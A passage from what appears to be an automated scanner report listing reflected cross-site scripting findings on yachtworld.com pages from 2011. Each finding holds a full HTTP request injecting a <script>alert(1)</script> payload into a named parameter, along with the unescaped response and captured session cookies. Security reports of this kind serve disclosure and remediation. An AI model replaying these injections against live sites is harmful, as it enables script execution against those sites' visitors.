Path:	/clarkslanding/clarkslanding_3.cgi

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload b927f--><script>alert(1)</script>be89640f230 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /clarkslanding/clarkslanding_3.cgi?company=clarkslanding&limit=50&type=&new=New&units=Feet&hosturl=clarkslandingb927f--><script>alert(1)</script>be89640f230&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:49:14 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<script>alert(1)</script>be89640f230/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslandingb927f-->
...[SNIP]...

3.324. http://www.yachtworld.com/clarkslanding/clarkslanding_3.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/clarkslanding/clarkslanding_3.cgi

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload f0dcc<script>alert(1)</script>32c656a0486 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /clarkslanding/clarkslanding_3.cgi?company=clarkslanding&limit=50&type=&new=New&units=Feet&hosturl=clarkslandingf0dcc<script>alert(1)</script>32c656a0486&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:49:12 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslandingf0dcc<script>alert(1)</script>32c656a0486/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslandingf0dcc<script>
...[SNIP]...

3.325. http://www.yachtworld.com/clarkslanding/email.cgi [office_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/clarkslanding/email.cgi

Issue detail

The value of the office_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1da5c"><script>alert(1)</script>6bb10187a64 was submitted in the office_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clarkslanding/email.cgi?url=clarkslanding&office_id=175801da5c"><script>alert(1)</script>6bb10187a64&boat_id=1810383&hosturl=clarkslanding&&ywo=clarkslanding&&includeNav=true HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 23:04:31 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1



<html>
<head>
<TITLE>Clarks Landing Boat & Yacht Sales (Point Pleasant, NJ)</TITLE>
<META name
...[SNIP]...
<INPUT TYPE="hidden" NAME="office_id" VALUE="175801da5c"><script>alert(1)</script>6bb10187a64">
...[SNIP]...

3.326. http://www.yachtworld.com/core/cached/includes/css/stylesheet-intl.css [11.4-Build-105&locale parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/cached/includes/css/stylesheet-intl.css

Issue detail

The value of the 11.4-Build-105&locale request parameter is copied into the HTML document as plain text between tags. The payload 3414f<script>alert(1)</script>5c769db9ffb was submitted in the 11.4-Build-105&locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/cached/includes/css/stylesheet-intl.css?11.4-Build-105&locale=us3414f<script>alert(1)</script>5c769db9ffb HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:05 GMT
Server: Apache
Cache-Control: private, max-age=31536000
Expires: Fri, 27 Jan 2012 19:39:05 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/css
Content-Length: 83369

body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size:11px;
color:#343434;
padding-top:0;
background:#F5EADC;
margin:0;
}

/*********** FROM STYLESHEET HOME *********/
bod
...[SNIP]...
<br>/cached/includes/css/stylesheet-us3414f<script>alert(1)</script>5c769db9ffb.css<br>
...[SNIP]...

3.327. http://www.yachtworld.com/core/globalnav/emailForm.jsp [refer_page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/globalnav/emailForm.jsp

Issue detail

The value of the refer_page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fef8"><script>alert(1)</script>6eb461135ab was submitted in the refer_page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/globalnav/emailForm.jsp?send_to=tech&refer_page=/core/globalnav/contactUs.jsp3fef8"><script>alert(1)</script>6eb461135ab HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:55 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<input type="hidden" name="refer_page" value="/core/globalnav/contactUs.jsp3fef8"><script>alert(1)</script>6eb461135ab">
...[SNIP]...

3.328. http://www.yachtworld.com/core/globalnav/emailForm.jsp [send_to parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/globalnav/emailForm.jsp

Issue detail

The value of the send_to request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1854"><script>alert(1)</script>6b27e78a154 was submitted in the send_to parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/globalnav/emailForm.jsp?send_to=techf1854"><script>alert(1)</script>6b27e78a154&refer_page=/core/globalnav/contactUs.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 